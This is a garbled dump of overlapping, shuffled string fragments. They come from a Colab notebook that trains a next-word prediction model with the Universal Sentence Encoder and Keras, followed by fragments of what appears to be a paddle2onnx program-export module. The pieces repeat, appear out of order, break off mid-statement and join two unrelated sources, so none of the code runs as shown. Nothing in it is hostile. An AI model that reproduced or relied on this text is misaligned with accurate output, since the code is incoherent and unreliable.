\"\"\"#**Unto the tests!**\"\"\" # Create function to predict and show detailed", "keras.models import Sequential import tensorflow.keras.backend as K from keras.layers.recurrent import LSTM from keras.layers", "Uncomment text under **PREVIEW OUTPUT** to further scrutinize. 
\"\"\" # Commented out IPython", "permissions for Colab to access Google Drive from google.colab import drive drive.mount(\"/gdrive\") #", "numpy.array(y_train) # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10])", "Tensorflow tutorial from Stanford, so all predicted words will be based on Deep", "LambdaCallback from keras.utils.data_utils import get_file from keras.layers.embeddings import Embedding from sklearn.model_selection import train_test_split", "that the **Current User** may be less fatigued and see beauty in the", "import string import numpy as np import pandas as pd import seaborn as", "be less fatigued and see beauty in the good work._ Uncomment text under", "import numpy import string import numpy as np import pandas as pd import", "be based on Deep learning and Machine learning _common terms_. \"\"\" # Storing", "the Universal Sentence Encoder's TF Hub module (Here we're making use of version", "texts in enumerate(vocabulary): primary_store[texts] = strings # PREVIEW OUTPUT :: # print(vocabulary[:50]) #", "X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42) y_test = numpy.array(y_test) y_train", "url to accept permissions for Colab to access Google Drive from google.colab import", "comments are written to facilitate smooth evaluation of the model, that the **Current", "' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW' output = 'corpus.txt' gdown.download(url, output, quiet=False) # sentence_length = 40 #", "+ ' --> ' + item + '\\nNEXT WORD: ' + item.split(' ')[-1]", "and effective', 'a nonconvex', 'a'] next_word(text_collection) \"\"\"## **For the record** The Dataset is", "y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" # Create function", "import numpy as np import pandas as pd import seaborn as sns import", "import drive drive.mount(\"/gdrive\") # %ls \"\"\"# **Import ***\"\"\" # Getting all required libraries", "embedding def embed(goodness): return appreciate(goodness) # REVIEW OUTPUT :: # appreciate.variables # Wrapping", "+ '\\n') # Tests - please feel free to explore single_text = ['and", "Y from the Vocabulary # yyyy[primary_store[xxxx[-1]]] = 1 yyyy[primary_store[xxxx[-1]]] = 1 y.append(yyyy) X_train,", "from keras.models import Sequential import tensorflow.keras.backend as K from keras.layers.recurrent import LSTM from", "X.append(' '.join(xxxx[:-1])) # X from the corpus yyyy = [0 for i in", "y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42) y_test = numpy.array(y_test) y_train = numpy.array(y_train)", "we're making use of version 4) # This will take a while but", "the model**\"\"\" model = Sequential() # model.add(Embedding(input_dim=len(vocabulary), output_dim=100)) model = Sequential() # model.add(LSTM(units=100,", "from the Vocabulary # yyyy[primary_store[xxxx[-1]]] = 1 yyyy[primary_store[xxxx[-1]]] = 1 y.append(yyyy) X_train, X_test,", "')[-1] + '\\n') # Tests - please feel free to explore single_text =", "X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42) y_test = numpy.array(y_test) y_train =", "model.add(Embedding(input_dim=len(vocabulary), output_dim=100)) model = Sequential() # model.add(LSTM(units=100, input_shape=[512])) model.add(Dense(512, input_shape=[512], activation = 'relu'))", "nonconvex', 'a'] next_word(text_collection) \"\"\"## **For the record** The Dataset is based on a", "Sentence 
# Splitting data into train sets and test sets
X = []
y = []
for c in lines:
    xxxx = c.replace('\n', '').split(' ')
    X.append(' '.join(xxxx[:-1]))  # X: the sentence minus its final word
    yyyy = [0 for i in range(len(vocabulary))]  # y: a one-hot row over the vocabulary
    yyyy[primary_store[xxxx[-1]]] = 1  # mark the held-out final word
    y.append(yyyy)

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42)
y_test = numpy.array(y_test)
y_train = numpy.array(y_train)

# PREVIEW OUTPUT ::
# print(X_train[:10])
# print(y_train[:10])
# print(X_test[:10])
# print(y_test[:10])
"""## **Embeddings!**"""

# Import the Universal Sentence Encoder's TF Hub module
# (Here we're making use of version 4)
# This will take a while but won't be long :)
module_url = "https://tfhub.dev/google/universal-sentence-encoder/4"
appreciate = hub.load(module_url)

# Making it easier - a thin wrapper function for embedding
def embed(goodness):
    return appreciate(goodness)

# PREVIEW OUTPUT ::
# appreciate.variables

# Wrapping up with the U-S-E: embed the raw sentences once, up front
X_train = embed(X_train)
X_test = embed(X_test)
X_train = X_train.numpy()
X_test = X_test.numpy()

# PREVIEW OUTPUT ::
# print(X_train[:10])
# print(y_train[:10])
# print(X_test[:10])
# print(y_test[:10])
# print(X_train.shape, X_test.shape, y_test.shape, y_train.shape)
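"""Why 512 appears everywhere below (an added sketch, not part of the original
notebook): USE v4 maps any piece of text to a fixed 512-dimensional vector, so
a single prompt and a batch of sentences differ only in the leading axis."""

sample = embed(['deep learning']).numpy()
print(sample.shape)   # (1, 512) - one vector per input string
print(X_train.shape)  # (num_train_sentences, 512)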
"""# **Building the model**"""

model = Sequential()
# Alternatives kept from experimentation:
# model.add(Embedding(input_dim=len(vocabulary), output_dim=100))
# model.add(LSTM(units=100, input_shape=[512]))
model.add(Dense(512, input_shape=[512], activation='relu'))  # 512 matches the USE vector size
model.add(Dense(units=len(vocabulary), activation='softmax'))  # one score per vocabulary word
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])
model.summary()

# Training the model.
model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20,
          validation_data=(X_test, y_test), callbacks=[LambdaCallback()])
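"""Optional: visualising training (an added sketch, not part of the original
notebook). `model.fit` returns a `History` object; capturing it, e.g. as
`history = model.fit(...)` in the cell above, lets you plot the accuracy
curves with the matplotlib import from earlier."""

# Assumes the fit call above was changed to `history = model.fit(...)`.
# plt.plot(history.history['acc'], label='train acc')
# plt.plot(history.history['val_acc'], label='val acc')
# plt.xlabel('epoch')
# plt.legend()
# plt.show()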
"""# **Unto the tests!**"""

# Create a function to predict and show detailed output
def next_word(collection=[], extent=1):
    for item in collection:
        text = item
        for i in range(extent):
            prediction = model.predict(x=embed([item]).numpy())
            idx = np.argmax(prediction[-1])
            item += ' ' + vocabulary[idx]
        print(text + ' --> ' + item + '\nNEXT WORD: ' + item.split(' ')[-1] + '\n')

# Tests - please feel free to explore
single_text = ['and some other essential']
next_word(single_text)

# Testing on a collection of words
text_collection = ['deep convolutional', 'simple and effective', 'a nonconvex', 'a']
next_word(text_collection)
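"""`next_word` above is greedy - it always takes the single most probable
word. A small variation (an added sketch using the same model and vocabulary,
not part of the original notebook) surfaces the top k candidates instead,
which makes the model's uncertainty visible."""

def next_word_topk(text, k=5):
    # One forward pass over the USE embedding of the prompt.
    prediction = model.predict(x=embed([text]).numpy())
    # Indices of the k largest scores, most probable first.
    top = np.argsort(prediction[-1])[-k:][::-1]
    return [(vocabulary[i], float(prediction[-1][i])) for i in top]

# PREVIEW OUTPUT ::
# print(next_word_topk('deep convolutional'))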
"corpus yyyy = [0 for i in range(len(vocabulary))] # Generate Y from the", ":: # appreciate.variables # Wrapping up with the U-S-E X_train = embed(X_train) X_test", "tensorflow.keras.backend as K from keras.layers.recurrent import LSTM from keras.layers import Dense, Activation from", "# Commented out IPython magic to ensure Python compatibility. # This cell will", "# -*- coding: utf-8 -*- \"\"\"Next-Word Prediction using Universal Sentence Encoder.ipynb Automatically generated", "fatigued and see beauty in the good work._ Uncomment text under **PREVIEW OUTPUT**", "# PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) #", "of version 4) # This will take a while but won't be long", "further scrutinize. \"\"\" # Commented out IPython magic to ensure Python compatibility. #", "model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc']) model.summary() # Training the model. model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20,", "import LSTM from keras.layers import Dense, Activation from keras.callbacks import LambdaCallback from keras.utils.data_utils", "model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" # Create", "= ['and some other essential'] next_word(single_text) # Testing on a collection of words", "= 40 # Read local file from directory with open('corpus.txt') as subject: cache", "text_collection = ['deep convolutional', 'simple and effective', 'a nonconvex', 'a'] next_word(text_collection) \"\"\"## **For", "# Read local file from directory with open('corpus.txt') as subject: cache = subject.readlines()", "as subject: cache = subject.readlines() translator = str.maketrans('', '', string.punctuation) # Remove punctuation", "the model. model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\"", "for c in lines: xxxx = c.replace('\\n','').split(' ') X.append(' '.join(xxxx[:-1])) # X from", "Hub module (Here we're making use of version 4) # This will take", "xxxx = c.replace('\\n','').split(' ') X.append(' '.join(xxxx[:-1])) # X from the corpus yyyy =", "from Google drive ''' ORIGINAL DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url = ' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW'", "Original file is located at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL # **Google drive for local storage** _NB:", "with the U-S-E X_train = embed(X_train) X_test = embed(X_test) X_train = X_train.numpy() X_test", "# Making it easier - Function for embedding def embed(goodness): return appreciate(goodness) #", "os import re import gdown import numpy import string import numpy as np", "Wrapping up with the U-S-E X_train = embed(X_train) X_test = embed(X_test) X_train =", "_common terms_. \"\"\" # Storing data vocabulary = numpy.array(vocabulary) numpy.save('./vocabulary.npy', vocabulary) model.save('./NWP-USE') ##", "for embedding def embed(goodness): return appreciate(goodness) # REVIEW OUTPUT :: # appreciate.variables #", "feel free to explore single_text = ['and some other essential'] next_word(single_text) # Testing", "# Getting all required libraries import os import re import gdown import numpy", "ensure Python compatibility. 
# This cell will prompt an external url to accept", "= 1 yyyy[primary_store[xxxx[-1]]] = 1 y.append(yyyy) X_train, X_test, y_train, y_test = train_test_split(X, y,", "= train_test_split(X, y, test_size=0.25, random_state=42) y_test = numpy.array(y_test) y_train = numpy.array(y_train) # PREVIEW", "= item for i in range(extent): prediction = model.predict(x=embed([item]).numpy()) idx = np.argmax(prediction[-1]) item", "to ensure Python compatibility. # This cell will prompt an external url to", "Corpus_**\"\"\" # Download data from Google drive ''' ORIGINAL DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt '''", "it easier - Function for embedding def embed(goodness): return appreciate(goodness) # REVIEW OUTPUT", "all required libraries import os import re import gdown import numpy import string", "= Sequential() # model.add(LSTM(units=100, input_shape=[512])) model.add(Dense(512, input_shape=[512], activation = 'relu')) model.add(Dense(units=len(vocabulary), activation =", "\"\"\"#**Unto the tests!**\"\"\" # Create function to predict and show detailed output def", "Commented out IPython magic to ensure Python compatibility. # This cell will prompt", "embed(goodness): return appreciate(goodness) # REVIEW OUTPUT :: # appreciate.variables # Wrapping up with", "item += ' ' + vocabulary[idx] print(text + ' --> ' + item", "in the good work._ Uncomment text under **PREVIEW OUTPUT** to further scrutinize. \"\"\"", "gdown import numpy import string import numpy as np import pandas as pd", "keras.layers.embeddings import Embedding from sklearn.model_selection import train_test_split \"\"\"## **Data preparation - _Generating Corpus_**\"\"\"", ":) module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate = hub.load(module_url) # Making it easier - Function", "lines: xxxx = c.replace('\\n','').split(' ') X.append(' '.join(xxxx[:-1])) # X from the corpus yyyy", "# print(vocabulary[:50]) # len(vocabulary) # Splitting data into Train sets and test sets", "= numpy.array(y_test) y_train = numpy.array(y_train) # PREVIEW OUTPUT :: # print(X_train[:10]) # print(y_train[:10])", "string import numpy as np import pandas as pd import seaborn as sns", "model.add(Dense(512, input_shape=[512], activation = 'relu')) model.add(Dense(units=len(vocabulary), activation = 'softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc']) model.summary()", "as pd import seaborn as sns import tensorflow as tf from absl import", "from keras.layers import Dense, Activation from keras.callbacks import LambdaCallback from keras.utils.data_utils import get_file", "effective', 'a nonconvex', 'a'] next_word(text_collection) \"\"\"## **For the record** The Dataset is based", "# print(y_test[:10]) # print(X_train.shape, X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building the model**\"\"\" model =", "model.summary() # Training the model. 
model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()])", "matplotlib.pyplot as plt from keras.models import Sequential import tensorflow.keras.backend as K from keras.layers.recurrent", "' + item.split(' ')[-1] + '\\n') # Tests - please feel free to", "get_file from keras.layers.embeddings import Embedding from sklearn.model_selection import train_test_split \"\"\"## **Data preparation -", "is based on a Tensorflow tutorial from Stanford, so all predicted words will", "as np import pandas as pd import seaborn as sns import tensorflow as", "print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) # print(X_train.shape, X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building the", "plt from keras.models import Sequential import tensorflow.keras.backend as K from keras.layers.recurrent import LSTM", "accept permissions for Colab to access Google Drive from google.colab import drive drive.mount(\"/gdrive\")", "[] y = [] for c in lines: xxxx = c.replace('\\n','').split(' ') X.append('", "for i in range(len(vocabulary))] # Generate Y from the Vocabulary # yyyy[primary_store[xxxx[-1]]] =", "# Training the model. model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto", "' + vocabulary[idx] print(text + ' --> ' + item + '\\nNEXT WORD:", "keras.layers import Dense, Activation from keras.callbacks import LambdaCallback from keras.utils.data_utils import get_file from", "data from Google drive ''' ORIGINAL DATASET URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url = '", "at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL # **Google drive for local storage** _NB: All comments are written", "facilitate smooth evaluation of the model, that the **Current User** may be less", "epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" # Create function to predict and", "item for i in range(extent): prediction = model.predict(x=embed([item]).numpy()) idx = np.argmax(prediction[-1]) item +=", "model. model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" #", "1 y.append(yyyy) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42) y_test =", "**Embeddings!**\"\"\" # Import the Universal Sentence Encoder's TF Hub module (Here we're making", "Remove punctuation lines = [doc.lower().translate(translator) for doc in cache] # Switch to lower", "OUTPUT** to further scrutinize. 
\"\"\" # Commented out IPython magic to ensure Python", "# X from the corpus yyyy = [0 for i in range(len(vocabulary))] #", "return appreciate(goodness) # REVIEW OUTPUT :: # appreciate.variables # Wrapping up with the", "np import pandas as pd import seaborn as sns import tensorflow as tf", "- Function for embedding def embed(goodness): return appreciate(goodness) # REVIEW OUTPUT :: #", "from the corpus yyyy = [0 for i in range(len(vocabulary))] # Generate Y", "print(X_train[:10]) # print(y_train[:10]) # print(X_test[:10]) # print(y_test[:10]) \"\"\"## **Embeddings!**\"\"\" # Import the Universal", "file from directory with open('corpus.txt') as subject: cache = subject.readlines() translator = str.maketrans('',", "['deep convolutional', 'simple and effective', 'a nonconvex', 'a'] next_word(text_collection) \"\"\"## **For the record**", "import matplotlib.pyplot as plt from keras.models import Sequential import tensorflow.keras.backend as K from", "beauty in the good work._ Uncomment text under **PREVIEW OUTPUT** to further scrutinize.", "= str.maketrans('', '', string.punctuation) # Remove punctuation lines = [doc.lower().translate(translator) for doc in", "shuffle=True, epochs=20, validation_data=(X_test, y_test), callbacks=[LambdaCallback()]) \"\"\"#**Unto the tests!**\"\"\" # Create function to predict", "Splitting data into Train sets and test sets X = [] y =", "import train_test_split \"\"\"## **Data preparation - _Generating Corpus_**\"\"\" # Download data from Google", "- _Generating Corpus_**\"\"\" # Download data from Google drive ''' ORIGINAL DATASET URL:", "essential'] next_word(single_text) # Testing on a collection of words text_collection = ['deep convolutional',", "print(X_test[:10]) # print(y_test[:10]) # print(X_train.shape, X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building the model**\"\"\" model", "**For the record** The Dataset is based on a Tensorflow tutorial from Stanford,", "next_word(collection=[], extent=1): for item in collection: text = item for i in range(extent):", "as hub from tensorflow import keras import matplotlib.pyplot as plt from keras.models import", "but won't be long :) module_url = \"https://tfhub.dev/google/universal-sentence-encoder/4\" appreciate = hub.load(module_url) # Making", "URL: https://raw.githubusercontent.com/maxim5/stanford-tensorflow-tutorials/master/data/arxiv_abstracts.txt ''' url = ' https://drive.google.com/uc?id=1YTBR7FiXssaKXHhOZbUbwoWw6jzQxxKW' output = 'corpus.txt' gdown.download(url, output, quiet=False)", "'))) primary_store = {} for strings, texts in enumerate(vocabulary): primary_store[texts] = strings #", "# Remove punctuation lines = [doc.lower().translate(translator) for doc in cache] # Switch to", "written to facilitate smooth evaluation of the model, that the **Current User** may", "**Import ***\"\"\" # Getting all required libraries import os import re import gdown", "primary_store[texts] = strings # PREVIEW OUTPUT :: # print(vocabulary[:50]) # len(vocabulary) # Splitting", "X_train = embed(X_train) X_test = embed(X_test) X_train = X_train.numpy() X_test = X_test.numpy() #", "# sentence_length = 40 # Read local file from directory with open('corpus.txt') as", "# PREVIEW OUTPUT :: # print(lines[0][:100]) # len(lines) # Generate an list of", "# This will take a while but won't be long :) module_url =", "y_test = numpy.array(y_test) y_train = numpy.array(y_train) # PREVIEW OUTPUT :: # print(X_train[:10]) #", "range(len(vocabulary))] # Generate Y from the Vocabulary # yyyy[primary_store[xxxx[-1]]] = 1 
"""# **Building the model**"""

model = Sequential()
# model.add(Embedding(input_dim=len(vocabulary), output_dim=100))
# model.add(LSTM(units=100, input_shape=[512]))
model.add(Dense(512, input_shape=[512], activation='relu'))
model.add(Dense(units=len(vocabulary), activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam',
              metrics=['accuracy'])  # (metrics argument assumed)

# Training the model.
model.fit(X_train, y_train, batch_size=512, shuffle=True, epochs=20,
          validation_data=(X_test, y_test), callbacks=[LambdaCallback()])
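# Aside (ours): the bare LambdaCallback() passed to fit() above installs no
# hooks, so it does nothing. A minimal sketch of how it is usually wired --
# the on_epoch_end hook is Keras API, the print body is our own:
log_callback = LambdaCallback(
    on_epoch_end=lambda epoch, logs: print('epoch', epoch, 'loss', logs['loss']))
# model.fit(..., callbacks=[log_callback])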
\"\"\" # Storing data vocabulary", "Stanford, so all predicted words will be based on Deep learning and Machine", "storage** _NB: All comments are written to facilitate smooth evaluation of the model,", "from keras.layers.embeddings import Embedding from sklearn.model_selection import train_test_split \"\"\"## **Data preparation - _Generating", "Drive from google.colab import drive drive.mount(\"/gdrive\") # %ls \"\"\"# **Import ***\"\"\" # Getting", "(Here we're making use of version 4) # This will take a while", "and show detailed output def next_word(collection=[], extent=1): for item in collection: text =", "'\\nNEXT WORD: ' + item.split(' ')[-1] + '\\n') # Tests - please feel", "Train sets and test sets X = [] y = [] for c", "in range(extent): prediction = model.predict(x=embed([item]).numpy()) idx = np.argmax(prediction[-1]) item += ' ' +", "Universal Sentence Encoder.ipynb Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL", "**PREVIEW OUTPUT** to further scrutinize. \"\"\" # Commented out IPython magic to ensure", "in enumerate(vocabulary): primary_store[texts] = strings # PREVIEW OUTPUT :: # print(vocabulary[:50]) # len(vocabulary)", "X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building the model**\"\"\" model = Sequential() # model.add(Embedding(input_dim=len(vocabulary), output_dim=100))", "= 'corpus.txt' gdown.download(url, output, quiet=False) # sentence_length = 40 # Read local file", "print(X_train.shape, X_test.shape, y_test.shape, y_train.shape) \"\"\"# **Building the model**\"\"\" model = Sequential() # model.add(Embedding(input_dim=len(vocabulary)," ]
[ "if input_spec is incomplete, declarative will throw error # inner_input_spec is list[InputSpec], it", "type is %s.\" % type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else: inner_layer", "saved, the input 'input_spec' should be None, but received the type of 'input_spec'", "in enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list = [var.name for var in target_vars]", "KIND, either express or implied. # See the License for the specific language", "= [ var.name for var in flatten(inputs) if isinstance(var, Variable) ] if input_spec", "Unless required by applicable law or agreed to in writing, software # distributed", "not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't work when setting ProgramTranslator.enable to False.\"", "Reserved. # # Licensed under the Apache License, Version 2.0 (the \"License\" #", "name in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and make sure they", "= uniq_target_vars target_var_name_list = [var.name for var in target_vars] origin_program = main_program.clone() main_program", "attr_func, None) if isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func:", "code blocks if not (bool(feeded_var_names) and all( isinstance(name, six.string_types) for name in feeded_var_names)):", "and # limitations under the License. from __future__ import absolute_import import os import", "flatten(inputs) if isinstance(var, Variable) ] if input_spec is None: # no prune return", "in input_spec if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names): # no prune", "if var.name not in output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for var in output_spec:", "main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program, fetch_var_names) main_program.desc._set_version() paddle.fluid.core.save_op_version_info(main_program.desc) main_program._copy_dist_param_info_from(origin_program) return", "Get input variables name ]. For output var, # we only support VarBase", "= [] for i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\" or", "# no prune result_list = input_var_names # if input spec name not in", "input type is %s.\" % type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else:", "# TODO(paddle-dev): polish these code blocks if not (bool(feeded_var_names) and all( isinstance(name, six.string_types)", "target_vars)): raise ValueError(\"'target_vars' should be a list of Variable.\") main_program = _get_valid_program(main_program) #", "need to be saved, the input 'input_spec' should be None, but received the", "uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list = [var.name for var in target_vars] origin_program =", "None) if isinstance(static_func, StaticFunction) and 'forward' != attr_func: raise ValueError( \"If there are", "using jit.save, please set InputSepc's name in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \"", "this file except in compliance with the License. # You may obtain a", "does not exists. 
\" \\ \"Please make sure the name of InputSpec or", "VarBase spec, and actually, we only need the # var name of output,", "\"When using jit.save, please set InputSepc's name in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[])", "isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func: # transform in", "transform in jit.save, if input_spec is incomplete, declarative will throw error # inner_input_spec", "var.name) else: result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator", "target_vars = [target_vars] elif export_for_deployment: if not (bool(target_vars) and all(isinstance(var, Variable) for var", "zeros before saving inference model\" ) break with program_guard(main_program): uniq_target_vars = [] for", "attr_func: raise ValueError( \"If there are static functions other than 'forward' that need", "Block, ParamBase, Program, Variable, Parameter, program_guard from paddle.fluid.dygraph.layers import Layer from paddle2onnx.utils import", "spec in input_spec if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names): # no", "result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not", "None) if isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func: #", "the name of InputSpec or example Tensor \" \\ \"in input_spec is the", "main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name for v in target_vars] for target_v in target_vars: if", "input_var_names # if input spec name not in input_var_names, only raise warning for", "is None: warnings.warn(name_none_error % spec) elif spec.name not in input_var_names: warnings.warn(name_no_exists_error % spec.name)", "from paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error", "output_vars_dict = OrderedDict() for var in flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name] = var", "out non-tensor type spec infos. input_spec = [ spec for spec in input_spec", "the input 'input_spec' should be None, but received the type of 'input_spec' is", "raise RuntimeError( \"The Paddle2onnx doesn't work when setting ProgramTranslator.enable to False.\" ) if", "like [ Get input variables name ]. 
For output var, # we only", "if the program contains auc op all_ops = main_program.global_block().ops for op in all_ops:", "% spec.name) else: # do nothing pass else: # prune for spec in", "we don't recommended to use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names", "op.type == 'auc': warnings.warn( \"please ensure that you have set the auc states", ") break with program_guard(main_program): uniq_target_vars = [] for i, var in enumerate(target_vars): uniq_target_vars.append(var)", "enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\" or op.type == \"fetch\": need_to_remove_op_index.append(i) for index", "op.type == \"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input(", "else: for var in output_spec: if var.name not in output_vars_dict: raise ValueError(name_no_exists_error %", "prune return input_var_names else: # fileter out non-tensor type spec infos. input_spec =", "ANY KIND, either express or implied. # See the License for the specific", "output, and we don't recommended to use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names", "but received input_spec's type is %s.\" % type(input_spec)) inner_input_spec = [] for var", "paddle.fluid import dygraph from paddle.fluid.dygraph.jit import declarative from paddle.fluid import core from paddle.fluid", "polish these code blocks if not (bool(feeded_var_names) and all( isinstance(name, six.string_types) for name", "for name in feeded_var_names)): raise ValueError(\"'feed_var_names' should be a list of str.\") if", "no prune return input_var_names else: # fileter out non-tensor type spec infos. input_spec", "var in output_spec: if var.name not in output_vars_dict: raise ValueError(name_no_exists_error % var.name) else:", "for target_v in target_vars: if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program,", "or op.type == \"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program =", "jit.save without input_spec, # avoid needless warning inner_input_spec = None else: continue input_var_names", "auc states to zeros before saving inference model\" ) break with program_guard(main_program): uniq_target_vars", "spec.name is None: warnings.warn(name_none_error % spec) elif spec.name not in input_var_names: warnings.warn(name_no_exists_error %", "import paddle from paddle.fluid.io import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils", "var in flatten(inputs) if isinstance(var, Variable) ] if input_spec is None: # no", "if op.type == \"feed\" or op.type == \"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]:", "in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and make sure they are", "append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error = \"The %s's name is None. 
\" \\", "\\ \"Layer.forward method.\" result_list = [] output_vars_dict = OrderedDict() for var in flatten(outputs):", "type(input_spec)) if not isinstance(input_spec, (list, tuple)): raise TypeError( \"The input input_spec should be", "from collections import OrderedDict from paddle.fluid import dygraph from paddle.fluid.dygraph.jit import declarative from", "dict() functions = dir(inner_layer) for attr_func in functions: static_func = getattr(inner_layer, attr_func, None)", "list of str.\") if isinstance(target_vars, Variable): target_vars = [target_vars] elif export_for_deployment: if not", "\"If there are static functions other than 'forward' that need to be saved,", "(c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See", "isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84):", "inner_layer = layer # avoid change user given input_spec inner_input_spec = None if", "for i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\" or op.type ==", "avoid needless warning inner_input_spec = None else: continue input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) #", "output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx", "input_spec: if spec.name is None: # name is None, the input_spec only can", "will throw error # inner_input_spec is list[InputSpec], it should be packed with same", "tuple)): raise TypeError( \"The input input_spec should be 'list', but received input_spec's type", "jit.save, if input_spec is incomplete, declarative will throw error # inner_input_spec is list[InputSpec],", "specific language governing permissions and # limitations under the License. from __future__ import", "global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "input input_spec should be 'list', but received input_spec's type is %s.\" % type(input_spec))", "if input spec name not in input_var_names, only raise warning for spec in", "= _get_valid_program(main_program) # remind user to set auc_states to zeros if the program", "ProgramTranslator, StaticFunction from paddle.fluid.layers.utils 